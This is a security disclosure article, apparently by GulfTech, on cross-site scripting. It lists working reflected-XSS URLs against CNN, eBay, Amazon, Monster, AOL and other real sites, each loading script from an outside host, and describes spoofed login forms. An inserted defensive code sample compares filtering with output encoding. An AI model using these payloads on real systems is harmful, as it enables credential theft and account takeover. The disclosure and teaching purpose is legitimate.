When Small Mistakes Can Cause Big Problems
September 18, 2021


What do popular websites such as Amazon, eBay, half.com, CareerBuilder, AOL, CNN, MTV, VH1, HBO and many others have in common? Well, aside from being amongst the most popular places on the internet, they also share a common flaw: Cross Site Scripting.


What Is "Cross Site Scripting"?
Cross Site Scripting occurs mostly from a lack of input validation within a vulnerable web application. This can allow an attacker to send a victim a malicious link which then renders the attacker's code in the context of the victim's browser. In other words, Person A can tell Person B "Hey, have a look at this cool website!" Person B has probably heard all about recent viruses and the like, and knows not to open attachments from unknown sources, to keep an up to date antivirus program, and to make sure their operating system has all of the required security patches. Person B probably does not think twice about visiting this website, but when he does, Person A's malicious code is executed. This is definitely not a good scenario, and has been officially recognized since February 2002 by various agencies such as the CERT Coordination Center, DoD-CERT, the DoD Joint Task Force for Computer Network Defense, the Federal Computer Incident Response Capability, and the National Infrastructure Protection Center as a very real attack vector.


The Risks Of Cross Site Scripting
Let's assume that in the example given earlier between Person A and Person B, the website used to render the malicious code was some less trusted website such as a blog or personal site. This probably poses a smaller risk, because not only would any smart user's suspicions be higher, but any data that could be stolen is probably insignificant compared to financial data and sensitive personal information. Now what if the same scenario presented itself on some major eCommerce website such as Amazon or eBay? The stakes are much higher for a few reasons. One is that the data stored on the website is much more sensitive (financial and personal information) and greatly desired by an attacker; the other is that the site is much more trusted because of its size and reputation. The problem with the second scenario is that it is not theoretical, but real.


The Problem Is Real!
GulfTech Security Research was able to find, in the past few weeks, cross site scripting issues that existed on eBay, Amazon, Half.com, HBO, CareerBuilder, AOL, CNN, MTV, and many others. The cross site scripting issues on these websites could allow an attacker to take control of arbitrary accounts or steal sensitive information. Websites such as eBay, Amazon, and Half.com (for example) have fairly good security when it comes to protecting their users' accounts, but even they are vulnerable to data theft via these vulnerabilities. For example, it may be somewhat useless to steal a victim's cookie, render malicious code, or force command execution on a website with tight account security. So instead of relying on some great technological advantage, an attacker could simply take advantage of the human element and have the victim hand over their account information. This can be done by using the cross site scripting vulnerabilities to temporarily deface a website. Instead of rendering malicious code or trying to steal a user's cookie, the attacker can link to an offsite JavaScript and have it render a login form using the vulnerable website's own HTML and style sheet, so that it looks nearly identical to the legitimate login form. Of course, when a victim logs in to this form it simply steals their login credentials. The attacker could also use the same methods of temporarily defacing the website to show someone a fictitious news story on a major news website.


How To Protect Yourself
The only foolproof way to protect yourself from these kinds of attacks is to turn off script support in your browser. This, however, greatly reduces the functionality of your browser in most cases. Other measures you can take to protect yourself are to examine links before you follow them. If you see something funny in the URL, such as an unusual number of hex-encoded characters, markup, or script, then you probably do not want to follow the link. It is also best not to check the "remember my password" option that a lot of sites make available. These steps will help you keep safe, but the majority of this problem comes from unsafe programming practices, and should be eliminated by the developers before the application is made publicly available.


See The Problems In Action
Before showing any real world examples, it is VERY important to know that GulfTech Research and Development does not condone the use of these flaws for malicious purposes. In fact, we heavily discourage it. These examples are here for information purposes only, and to give both consumers and web developers a look at what not to do and what kind of links NOT to follow. I have made attempts to contact the affected websites before writing this article. Only a few responded, and even some of those did not get it right. CNN, for example, was one of the few that responded, and seemed to have fixed the problem shortly after. The problem was, though, that if I entered any script in an unorthodox manner, such as varying the case (sCrIPt) or tying script attributes to another tag, then the code would still be executed. Now it seems that no protection is in place at all. This could allow a malicious user to attack accounts within the cnn.com domain, spoof a login form that sends the attacker the victim's login credentials, or put up their own bogus news story and make it look flawlessly legit by viewing the outputted source code and injecting their defacement in such a manner that the flow of the code is not interrupted at all. In this example we see the GTRAD name in big letters, but we also see broken tags which make it look sloppy and suspicious; as I said before, this can be avoided.

http://search.cnn.com/pages/search/advanced.jsp?Coll=cnn_xml&QuerySubmit=true&Page=1&QueryText=%22%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E
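The CNN fix described above failed because it was a keyword blacklist: it stripped the literal tag name but not a case-variant like sCrIPt, and not script attributes attached to some other tag. The following is an added example, not code from GulfTech or from any of the sites named in this article; the search-page template, the example.invalid host, and the three test inputs are constructed for illustration. It compares such a blacklist against contextual output encoding on a page that reflects the query into an attribute, which is the pattern behind every search-form URL on this page.

```javascript
// Contextual output encoding: makes user input inert inside an HTML
// attribute value or text node by escaping the five HTML metacharacters.
// (Other contexts, such as inside a <script> block or a URL, need their
// own encoder; the ASP examples below break out of a JavaScript string.)
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// A blacklist of the kind the article says cnn.com first deployed: it
// removes the literal lowercase tag and nothing else.
function naiveFilter(s) {
  return String(s).replace(/<script/g, '').replace(/<\/script>/g, '');
}

// Constructed search page that reflects the query into value="" after
// applying the chosen defence, as the vulnerable search forms did.
function renderSearchPage(query, defence) {
  return `<input type="text" name="q" value="${defence(query)}">`;
}

// Count '<' in the rendered output. Exactly one means the query stayed
// inside the attribute; more than one means it broke out and opened a tag.
function openedTags(html) {
  return (html.match(/</g) || []).length;
}

// Constructed inputs modelled on the cases the article describes:
// the plain tag, the case-varied tag, and a script attribute on another tag.
const PAYLOADS = {
  lowercase: '"><script src="http://example.invalid/x.js"></script>',
  mixedCase: '"><sCrIPt src="http://example.invalid/x.js"></sCrIPt>',
  otherTag: '"><img src="x" onerror="alert(1)">',
};

// Run every constructed input through a defence and report tag counts.
function evaluate(defence) {
  const result = {};
  for (const [name, payload] of Object.entries(PAYLOADS)) {
    result[name] = openedTags(renderSearchPage(payload, defence));
  }
  return result;
}

console.log('blacklist:', evaluate(naiveFilter)); // only the lowercase case is stopped
console.log('encoding: ', evaluate(htmlEncode));  // every case stays inside the attribute
```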

CNN is not the only large and trusted news website affected, though. Another example is ABC News. The vulnerability present in ABC News is sort of an example of what I will be talking about next.

http://infospace.abcnews.com/_1_2B4MUKW03Y7ZYZZ__info.abcnws/dog/results?otmpl=dog/webresults.htm&qcat=web&ran=&qkw=%22%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E%3C!--%3C!--

Another scenario is large domains putting their trust in someone else's code. Take, for example, the LiveWorld product issues GulfTech released a few weeks ago. The vulnerabilities affected the likes of HBO, eBay, and others. The affected domains did not host the vulnerable software; LiveWorld did. The problem is that hostnames under the parent domains were still used to serve it:

http://answercenter.ebay.com/search.jsp?q=%22%3E%3Cscript+src%3D%22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript%3E%3C%21--%3C%21--

http://groups.ebay.com/findclub!execute.jspa?q=%22%3E%3Cscript+src%3D%22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript%3E%3C%21--%3C%21--

http://forums.ebay.com/search.jsp?q=%22%3E%3Cscript+src%3D%22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript%3E

http://boards.hbo.com/search!execute.jspa?q=%22%3E%3Cscript+src%3D%22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript%3E%3C%21--%3C%21--

What does this mean? Well, it can affect both the human element and the technical element. On one hand, an attacker could possibly steal information associated with the parent domains, such as cookie data; and in cases where that was not a preferred avenue of attacking a victim, a malicious user may temporarily deface a webpage with a spoofed login form. Because the user trusts the domain, the second attack is much easier to pull off. LiveWorld fixed these issues after I made them public, but never did respond when I informed them of the issues in advance of the public release.

So, what could be worse than what we have already talked about? How about an attacker gaining access to sensitive personal and financial data? Well, this is a possibility, and you will soon see how. Let's think about some websites that are becoming household names when it comes to commerce and employment. Employment websites, for example, usually require a good deal of personal information. Monster and CareerBuilder are probably two of the most popular websites available for both job seekers and employers. Unfortunately, they are also vulnerable to the same cross site scripting issues I talked about before.

http://my.monster.com/viewresume.asp?nextpage=home.asp%22%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E&resumeid=RESUMEIDHERE&original=current

http://www.careerbuilder.com/share/Login.asp?sc_cmp2=JS_HP1_Nav_MyCB%22%20//--%3E%3C/script%3E%3C/script%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E%3Cscript%3E%3C!--%20var%20blah=%22

Seeing as identity theft is on the rise, vulnerabilities on major employment websites such as these could be potentially devastating if successfully exploited. Now let's talk about eCommerce. Earlier I pointed out ways eBay users could be attacked, so I will not talk about eBay again here even though it definitely falls into this category, but I will talk about eBay's half.com as well as Amazon and others. These are the same types of attacks, and can potentially lead to the same consequences.

http://half.ebay.com/search/search.jsp?nthTime=&product=all&keyword=%22%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E&x=0&y=0

http://www.amazon.com/exec/obidos/tg/detail/-/0802132952/%22%3E%3E%3Cscript%20src=http://stuff.gulftech.org/foobar.js%3E%3C/script%3E/ref=pd_sim_books_3/104-8941545-9279926/103-1795435-7689412?v=glance&s=books

Both Half.com and Amazon do a fairly good job of protecting users' accounts. Stealing cookies may be trivial, but spoofed login forms and even some forced command execution are definitely possible. Sure, these are all interesting, and for some of us equally worrisome, but it seems a bit humorous when large technical entities leave themselves open to the same kinds of attacks. Who would allow this, you ask? Well, AOL, Veritas, Intel, and many others.

http://www.aol.com/support/index.adp?toc=%22%22%20//--%3E%3C/script%3E%3C/script%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E%3Cscript%3E%3C!--%20var%20blah=%22

http://search.intel.com/support/search.asp?q1=%22%3E%3Ch1%3EGulfTech%20Research%20And%20Development%3C/h1%3E%3C!--%3C!--%3C!--%3C!--%3C!--

http://forums.veritas.com/discussions/search!execute.jspa?q=%22%3E%3Cscript+src%3D%22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript%3E%3C%21--%3C%21--

I hope that as a user you now have a better idea of what to look out for, and know that these types of attacks are very real and can be exploited, and that a very large number of your favorite sites could be vulnerable to them. A few more examples:

http://searchb.disney.go.com/disneySearch?col1=disney%20store%20parks%20video&qt=%22%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E

http://faq.orbitz.com/cgi-bin/orbitz.cfg/php/enduser/std_search_custom.php?p_new_search=1&p_search_text=%22%3E%3Cscript+src%3D%22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript%3E%3C%21--%3C%21--

http://www.mtv.com/community/profiles/profile_not_found.jhtml?username=%22%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E

http://www.vh1.com/search/search_shows.jhtml?sorttype=by_name_asc&searchtype=show&searchterm=%22%3E%3Cscript%20src=%22http://stuff.gulftech.org/foobar.js%22%3E%3C/script%3E

The best way to learn to be safe is to know the risks, and become familiar with potential attack types. I hope this article has helped with this.


Disclaimer
GulfTech Security Research has discovered all of these XSS issues independently. We are in no way affiliated with any of the named companies. We greatly discourage the use of these examples for malicious purposes, and cannot be held responsible for any individual's actions. If you would like to use any of these examples on your website, feel free to as long as you give us credit and do not use them for malicious purposes.


References
Possible Security Issues In LiveWorld Products
http://www.gulftech.org/?node=research&article_id=00044-08232004

CERT® Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests
http://www.cert.org/advisories/CA-2000-02.html

The Cross Site Scripting FAQ
http://www.cgisecurity.com/articles/xss-faq.shtml

Preventing Cross-site Scripting Attacks
http://www.perl.com/pub/a/2002/02/20/css.html